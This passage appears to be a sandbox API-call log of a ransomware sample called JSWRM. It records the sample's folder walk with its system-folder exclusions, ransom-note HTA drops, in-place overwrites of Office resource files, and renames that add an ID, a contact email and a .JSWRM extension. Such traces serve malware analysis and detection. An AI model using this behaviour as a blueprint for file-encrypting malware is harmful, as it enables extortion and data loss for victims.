(in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0127.198] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1033\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1033\\powerpivotexcelclientaddin.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0127.199] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=71264) returned 1 [0127.199] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.199] ReadFile (in: hFile=0x264, lpBuffer=0x27a340, nNumberOfBytesToRead=0x11660, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesRead=0x345de64*=0x11660, lpOverlapped=0x0) returned 1 [0127.205] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.206] WriteFile (in: hFile=0x264, lpBuffer=0x27a340*, nNumberOfBytesToWrite=0x11660, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesWritten=0x345de60*=0x11660, lpOverlapped=0x0) returned 1 [0127.206] CloseHandle (hObject=0x264) returned 1 [0127.206] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1033\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1033\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1033\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1033\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.207] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42fef17, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf42fef17, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11660, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 0 [0127.207] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0127.208] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a56cbe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a7cf13, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6a7cf13, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="1035", cAlternateFileName="")) returned 1 [0127.208] lstrcmpiW (lpString1="1035", lpString2=".") returned 1 [0127.208] lstrcmpiW (lpString1="1035", lpString2="..") returned 1 [0127.208] lstrcmpiW (lpString1="1035", lpString2="...") returned 1 [0127.208] lstrcmpiW (lpString1="1035", lpString2="windows") returned -1 [0127.208] lstrcmpiW (lpString1="1035", lpString2="recovery") returned -1 [0127.208] lstrcmpiW (lpString1="1035", lpString2="perflogs") returned -1 [0127.208] lstrcmpiW (lpString1="1035", lpString2="documents and settings") returned -1 [0127.208] lstrcmpiW (lpString1="1035", lpString2="$RECYCLE.BIN") returned 1 [0127.208] lstrcmpiW (lpString1="1035", lpString2="system volume information") returned -1 [0127.208] lstrcmpiW (lpString1="1035", lpString2="msocache") returned -1 [0127.208] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1035\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1035\\jswrm-decrypt.hta")) returned 0xffffffff [0127.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0127.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0127.209] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1035\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1035\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0127.210] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.210] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.211] CloseHandle (hObject=0x338) returned 1 [0127.211] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1035\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1035\\jswrm-decrypt.hta")) returned 0x20 [0127.211] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1035\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a56cbe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a7cf13, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x427bd3ad, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0127.211] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0127.211] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6a56cbe, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a7cf13, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x427bd3ad, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="..", cAlternateFileName="")) returned 1 [0127.211] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0127.211] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0127.212] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x427bd3ad, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x427bd3ad, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x427bd3ad, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0127.212] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0127.212] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0127.212] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0127.212] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0127.212] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0127.212] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0127.212] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0127.212] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0127.212] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0127.212] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0127.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0127.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0127.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0127.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0127.212] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6a7cf13, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a7cf13, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x114c0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 1 [0127.212] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2=".") returned 1 [0127.212] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="..") returned 1 [0127.212] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="...") returned 1 [0127.212] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="windows") returned -1 [0127.212] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="recovery") returned -1 [0127.212] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="perflogs") returned 1 [0127.212] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="documents and settings") returned 1 [0127.212] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="$RECYCLE.BIN") returned 1 [0127.212] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="system volume information") returned -1 [0127.212] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="msocache") returned 1 [0127.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0127.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x2411c8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0127.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0127.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x240fc0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0127.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0127.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0127.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1035\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1035\\powerpivotexcelclientaddin.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0127.213] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=70848) returned 1 [0127.213] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.213] ReadFile (in: hFile=0x264, lpBuffer=0x27a340, nNumberOfBytesToRead=0x114c0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesRead=0x345de64*=0x114c0, lpOverlapped=0x0) returned 1 [0127.222] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.222] WriteFile (in: hFile=0x264, lpBuffer=0x27a340*, nNumberOfBytesToWrite=0x114c0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesWritten=0x345de60*=0x114c0, lpOverlapped=0x0) returned 1 [0127.223] CloseHandle (hObject=0x264) returned 1 [0127.223] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1035\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1035\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1035\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1035\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.224] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6a7cf13, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6a7cf13, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x114c0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 0 [0127.224] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0127.224] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa911c96, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa911c96, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa911c96, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="1036", cAlternateFileName="")) returned 1 [0127.224] lstrcmpiW (lpString1="1036", lpString2=".") returned 1 [0127.224] lstrcmpiW (lpString1="1036", lpString2="..") returned 1 [0127.224] lstrcmpiW (lpString1="1036", lpString2="...") returned 1 [0127.224] lstrcmpiW (lpString1="1036", lpString2="windows") returned -1 [0127.224] lstrcmpiW (lpString1="1036", lpString2="recovery") returned -1 [0127.224] lstrcmpiW (lpString1="1036", lpString2="perflogs") returned -1 [0127.224] lstrcmpiW (lpString1="1036", lpString2="documents and settings") returned -1 [0127.224] lstrcmpiW (lpString1="1036", lpString2="$RECYCLE.BIN") returned 1 [0127.224] lstrcmpiW (lpString1="1036", lpString2="system volume information") returned -1 [0127.225] lstrcmpiW (lpString1="1036", lpString2="msocache") returned -1 [0127.225] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1036\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1036\\jswrm-decrypt.hta")) returned 0xffffffff [0127.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0127.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0127.225] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1036\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1036\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0127.226] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.226] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.227] CloseHandle (hObject=0x338) returned 1 [0127.227] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1036\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1036\\jswrm-decrypt.hta")) returned 0x20 [0127.227] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1036\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa911c96, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa911c96, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x427e38f8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName=".", cAlternateFileName="")) returned 0x231b40 [0127.227] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0127.227] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa911c96, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa911c96, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x427e38f8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="..", cAlternateFileName="")) returned 1 [0127.227] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0127.227] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0127.227] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x427e38f8, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x427e38f8, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x427e38f8, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0127.227] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0127.227] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0127.227] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0127.227] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0127.227] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0127.227] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0127.227] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0127.227] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0127.227] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0127.227] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0127.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0127.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0127.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0127.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0127.228] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa911c96, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa911c96, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11c60, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 1 [0127.228] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2=".") returned 1 [0127.228] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="..") returned 1 [0127.228] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="...") returned 1 [0127.228] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="windows") returned -1 [0127.228] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="recovery") returned -1 [0127.228] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="perflogs") returned 1 [0127.228] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="documents and settings") returned 1 [0127.228] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="$RECYCLE.BIN") returned 1 [0127.228] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="system volume information") returned -1 [0127.228] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="msocache") returned 1 [0127.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0127.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x241128, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0127.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 